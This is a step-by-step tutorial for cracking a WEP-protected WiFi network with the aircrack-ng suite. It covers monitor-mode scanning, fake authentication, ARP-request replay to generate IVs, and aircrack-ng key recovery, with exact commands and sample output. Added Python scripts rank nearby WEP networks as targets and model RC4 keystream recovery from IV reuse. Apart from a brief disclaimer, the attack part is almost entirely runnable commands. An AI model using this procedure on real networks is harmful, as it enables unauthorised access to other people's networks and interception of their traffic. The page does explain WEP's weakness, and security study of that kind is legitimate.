Hacking WEP in under 10 minutes
WEP, also known as Wired Equivalent Privacy, is a form of encryption used in early WiFi networks. While it is not recommended today, a very high percentage of people are still using it. As with most technology, people just set it and forget it, leaving a large number of under-secured networks in the airwaves. As always, I am not recommending you try hacking your neighbors' WiFi networks. This should be done entirely with your own equipment.
To start out we need to find our target network. For this we will use airodump-ng.
Run the following command to get started, replacing wlan1 with the name of your own wireless interface. The interface must already be in monitor mode (for example via airmon-ng); airodump-ng cannot capture other stations' frames from a managed-mode interface.
airodump-ng wlan1
The output should look something like this
CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

28:EF:01:26:46:0B  -29       19        1    0   6  54e  WEP  WEP         linksys
28:EF:01:5D:43:58  -42       17        0    0   6  54e  WPA2 CCMP   PSK  NETGEAR

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

28:EF:01:26:46:0B  28:EF:01:DB:36:A4  -57    0 - 1      0        1  linksys
As you can see we have an access point using WEP with the SSID "linksys", and we also have a client attached to it.
For this attack to work we need traffic, which in practice means an attached client. It is possible to crack WEP without one, but for this how-to we will be hacking WEP with a client already authenticated. Hacking WEP without an active client will be covered in another article.
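As an added example (not part of the original post), the script below does the target triage described above from airodump-ng's CSV output rather than by eye, picking out WEP access points that already have a client associated. It assumes airodump-ng was started with -w so that it writes a prefix-01.csv beside the capture; the SAMPLE_CSV embedded here is constructed to mirror the scan shown above, plus one extra WEP network with no client, so it runs offline.

```python
# Added example (not from the original post): triage airodump-ng's CSV output to
# list WEP access points that have an associated client, which is what the
# ARP-replay approach in this write-up needs. The CSV is written as
# <prefix>-01.csv when airodump-ng runs with -w; SAMPLE_CSV below is constructed
# to mirror the scan shown in the post, plus one WEP network with no client.
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
28:EF:01:26:46:0B, 2012-05-20 11:09:01, 2012-05-20 11:09:09,  6,  54, WEP , WEP, , -29, 19, 1, 0.  0.  0.  0, 7, linksys, 
28:EF:01:5D:43:58, 2012-05-20 11:09:01, 2012-05-20 11:09:09,  6,  54, WPA2, CCMP, PSK, -42, 17, 0, 0.  0.  0.  0, 7, NETGEAR, 
00:11:22:33:44:55, 2012-05-20 11:09:03, 2012-05-20 11:09:09, 11,  54, WEP , WEP, , -70, 4, 0, 0.  0.  0.  0, 5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
28:EF:01:DB:36:A4, 2012-05-20 11:09:02, 2012-05-20 11:09:09, -57, 1, 28:EF:01:26:46:0B, linksys
AA:BB:CC:DD:EE:FF, 2012-05-20 11:09:05, 2012-05-20 11:09:08, -80, 3, (not associated), 
"""


def _rows(section: str) -> list:
    """Parse one CSV section into dicts keyed by the (stripped) header names."""
    if not section.strip():
        return []
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for r in reader:
        if not r or not r[0].strip():
            continue
        rows.append({h: v.strip() for h, v in zip(header, r)})
    return rows


def parse_airodump_csv(text: str):
    """airodump-ng separates the AP table and the station table with a blank line."""
    ap_section, _, station_section = text.partition("\n\n")
    return _rows(ap_section), _rows(station_section)


def wep_targets(text: str) -> list:
    """WEP access points, most attackable first: those with clients, then strongest signal."""
    aps, stations = parse_airodump_csv(text)
    clients = {}
    for s in stations:
        clients.setdefault(s["BSSID"], []).append(s["Station MAC"])
    targets = []
    for ap in aps:
        # The Privacy column reads e.g. "WEP", "WPA2", "WPA2 WPA" or "OPN"
        if "WEP" not in ap["Privacy"].split():
            continue
        targets.append({
            "bssid": ap["BSSID"],
            "channel": int(ap["channel"]),
            "essid": ap["ESSID"],
            "power": int(ap["Power"]),
            "clients": clients.get(ap["BSSID"], []),
        })
    targets.sort(key=lambda t: (-len(t["clients"]), -t["power"]))
    return targets


if __name__ == "__main__":
    for t in wep_targets(SAMPLE_CSV):
        status = "client(s) attached" if t["clients"] else "no client yet"
        print(f'{t["bssid"]}  ch {t["channel"]:>2}  {t["essid"]:<12} {status}')
```

Run against a real capture with `wep_targets(open("linksys.wep-01.csv").read())`; the first entry is the one to feed into the -c and --bssid switches in the next step.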
First we need to start capturing packets from the access point. To do this we filter out everything but the target access point:
airodump-ng -c 6 --bssid 28:EF:01:26:46:0B -w ./linksys.wep wlan1
The switches to this command are below:
-c = channel of the target access point
--bssid = MAC address of the target access point
-w = path and name prefix for the capture files. I named mine "linksys.wep" as a descriptive name, but the name is irrelevant; make it whatever you want. Note that airodump-ng appends a sequence number to the prefix (e.g. linksys.wep-01.cap), so check the actual filename with ls before you point aircrack-ng at it.
The output should look like this. Leave this window open and running.
CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

28:EF:01:26:46:0B  -29       19        1    0   6  54e  WEP  WEP         linksys

BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Now we need to fake an authentication with the target router. To do this we use aireplay-ng with the command below in a new terminal window.
aireplay-ng -1 0 -e linksys -a 28:EF:01:26:46:0B -h {adaptor MAC} wlan1
The switches to this command are below:
-1 = Attack mode 1 = fake authentication
0 = reassociation delay in seconds; 0 means a single authentication attempt rather than periodic re-authentication
-e = ESSID of the target access point
-a = MAC address of the target access point
-h = MAC address of your own adaptor (in my case wlan1)
You should get output like this telling you it was successful.
13:54:17  Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6
13:54:17  Sending Authentication Request (Open System) [ACK]
13:54:17  Authentication successful
13:54:17  Sending Association Request [ACK]
13:54:17  Association successful :-) (AID: 1)
You will also notice your MAC address now listed as a station under the access point in the instance of airodump-ng you have running. If it does not show up in airodump-ng then something went wrong. Run the above command again, check that the ESSID and MAC address belong to the target access point, and make sure you are using your adaptor's real MAC address by typing ifconfig (or ip link). You need the MAC address of the adaptor you are using to perform the attack; if your MAC is spoofed, use the spoofed MAC. If fake authentication keeps failing with the right addresses, the access point may be filtering clients by MAC address.
After this succeeds you need to run an ARP request re-injection attack to generate as many IVs as possible. The IVs, or initialization vectors, are what make WEP so weak. WEP prepends a 24-bit IV to the secret key to form the per-packet RC4 key and transmits the IV in clear text. Because the IV space is so small (about 16.7 million values) IVs get reused, and because the IV is known to everyone listening, each captured packet leaks a little statistical information about the key bytes; with enough distinct IVs, aircrack-ng can recover the WEP key. Since we don't want to wait ages to collect the required number of IVs (30 to 40 thousand is what I recommend), we will use aireplay-ng to conduct an ARP request re-injection attack and make the access point start spitting out IVs.
Basically what we are doing is listening for ARP requests and bouncing them back to the access point when we see them. Each time, the access point re-transmits the ARP request encrypted under a new IV. These IVs are collected by airodump-ng and can be fed to aircrack-ng later.
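To make the IV argument concrete, here is an added Python model of WEP's use of RC4 (example code written for this page, not part of the original post or of aircrack-ng). It uses the 40-bit key recovered later in the write-up and constructed ARP payloads, and shows three things: two frames sharing an IV share a keystream, so XORing their ciphertexts yields the XOR of their plaintexts; a predictable header (the LLC/SNAP bytes every ARP frame starts with) hands an attacker the keystream for that IV without knowing the key; and with only 2^24 IVs, a randomly chosen IV is expected to repeat after roughly 5,000 frames. The RC4 routine is the textbook one and is checked against the standard "Key"/"Plaintext" test vector.

```python
# Added example (not from the original post): a minimal model of WEP's use of
# RC4 that shows why the 24-bit IV matters. WEP seeds RC4 with IV || key and
# sends the IV in the clear, so any two frames that share an IV share a
# keystream. The key is the one recovered in the write-up; all frames here
# are constructed.
import math
import random
import zlib

WEP_KEY = bytes.fromhex("F2C7BB35B9")          # 40-bit key from the post's lab run
# 802.11 data frames carry an LLC/SNAP header before the payload; for an ARP
# packet the first 8 plaintext bytes are always these (ethertype 0x0806).
ARP_LLC_SNAP = bytes.fromhex("AAAA030000000806")


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def with_icv(plaintext: bytes) -> bytes:
    """WEP appends a CRC-32 integrity check value (little-endian) before encrypting."""
    return plaintext + zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Encrypted body of a WEP frame. The IV itself travels unencrypted in the
    frame header, so an eavesdropper always knows which IV was used."""
    assert len(iv) == 3, "WEP IV is 24 bits"
    body = with_icv(plaintext)
    return xor_bytes(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(iv: bytes, key: bytes, ciphertext: bytes) -> bytes:
    body = xor_bytes(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    plaintext, icv = body[:-4], body[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def keystream_from_known_plaintext(ciphertext: bytes, known_prefix: bytes) -> bytes:
    """Keystream bytes for this IV, recovered without the key: C xor P = K.
    Predictable headers like ARP_LLC_SNAP are what make this possible."""
    return xor_bytes(ciphertext[: len(known_prefix)], known_prefix)


def birthday_bound(iv_bits: int = 24) -> int:
    """Expected number of random IVs before the first repeat: sqrt(pi/2 * 2^bits)."""
    return int(math.sqrt(math.pi / 2 * 2 ** iv_bits))


def frames_until_iv_repeat(seed: int, iv_bits: int = 24) -> int:
    """Simulate a card that picks IVs at random and count frames until one repeats."""
    rng = random.Random(seed)
    seen = set()
    count = 0
    while True:
        iv = rng.getrandbits(iv_bits)
        count += 1
        if iv in seen:
            return count
        seen.add(iv)


if __name__ == "__main__":
    iv = bytes.fromhex("0A1B2C")
    p1 = ARP_LLC_SNAP + b"who-has 192.168.1.1?"   # constructed payloads
    p2 = ARP_LLC_SNAP + b"who-has 192.168.1.77"
    c1, c2 = wep_encrypt(iv, WEP_KEY, p1), wep_encrypt(iv, WEP_KEY, p2)
    # Same IV -> same keystream -> XOR of ciphertexts equals XOR of plaintexts
    assert xor_bytes(c1, c2) == xor_bytes(with_icv(p1), with_icv(p2))
    ks = keystream_from_known_plaintext(c1, ARP_LLC_SNAP)
    print("keystream for IV", iv.hex(), "recovered without the key:", ks.hex())
    print("expected frames before an IV repeat:", birthday_bound(),
          "(one simulated run:", frames_until_iv_repeat(1), ")")
```

Note that keystream recovery from a known header is the mechanism behind replaying and forging frames; the key-recovery attack aircrack-ng runs (PTW) goes further and uses the known IV plus recovered keystream bytes from tens of thousands of frames to infer the key bytes themselves, which is why the ARP replay step matters.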
Now time to have some fun. Type this command below.
aireplay-ng -3 -b 28:EF:01:26:46:0B -h {adaptor MAC} wlan1
The switches to this command are below:
-3 = Attack mode 3 = ARP request replay attack
-b = MAC address of the target router
-h = MAC address of your adaptor
The output here depends on how many clients are authenticated; the more traffic the better. If you only have a single client, like I did, you may have to be patient, but after a minute or so the ARP requests should start flying. Here is what the output should look like.
13:57:51  Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6
Saving ARP requests in replay_arp-0520-135751.cap
You should also start airodump-ng to capture replies.
^C
Read 152425 packets (got 71155 ARP requests and 40654 ACKs), sent 52101 packets...(499 pps)
I usually wait until I have about 40,000+ ACKs. The more the better. Just be patient and let airodump-ng capture all of those ARP replies; they are what contain the IVs we need. The #Data column in the airodump-ng window is the count of captured data frames, and for a WEP network that is effectively the IV count, so keep an eye on it.
Once you are happy with what you have, hit Ctrl+C to stop the ARP attack. At this point you can also kill airodump-ng or leave it running; it's up to you. We should have what we need already.
The final step is to run aircrack-ng against the cap file that airodump-ng created while you were doing all of this.
For that run this command.
aircrack-ng ./linksys.wep.cap
The output of this command should give you the WEP key as it does below.
Opening ./linksys.wep.cap
Read 239747 packets.

   #  BSSID              ESSID                     Encryption

   1  28:EF:01:26:46:0B  linksys                   WEP (58246 IVs)

Choosing first network as target.

Opening ./linksys.wep.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 58258 ivs.
KEY FOUND! [ F2:C7:BB:35:B9 ]
Decrypted correctly: 100%
And that's it. How can it get any easier than that? It took my 1.677 GHz dual-core Atom netbook about 2 seconds to find the WEP key once the packets were captured. With practice this entire attack can be done in about 10 minutes or less, and that includes the time it takes to set up.
Thanks for reading and I hope you enjoyed it. Remember, this information is meant to show you the dangers of using WEP encryption; it is not intended to teach you how to hack your neighbors' router and cause trouble. Please don't use this information to hurt other people. Not only is it illegal, it's also not very nice. ;-)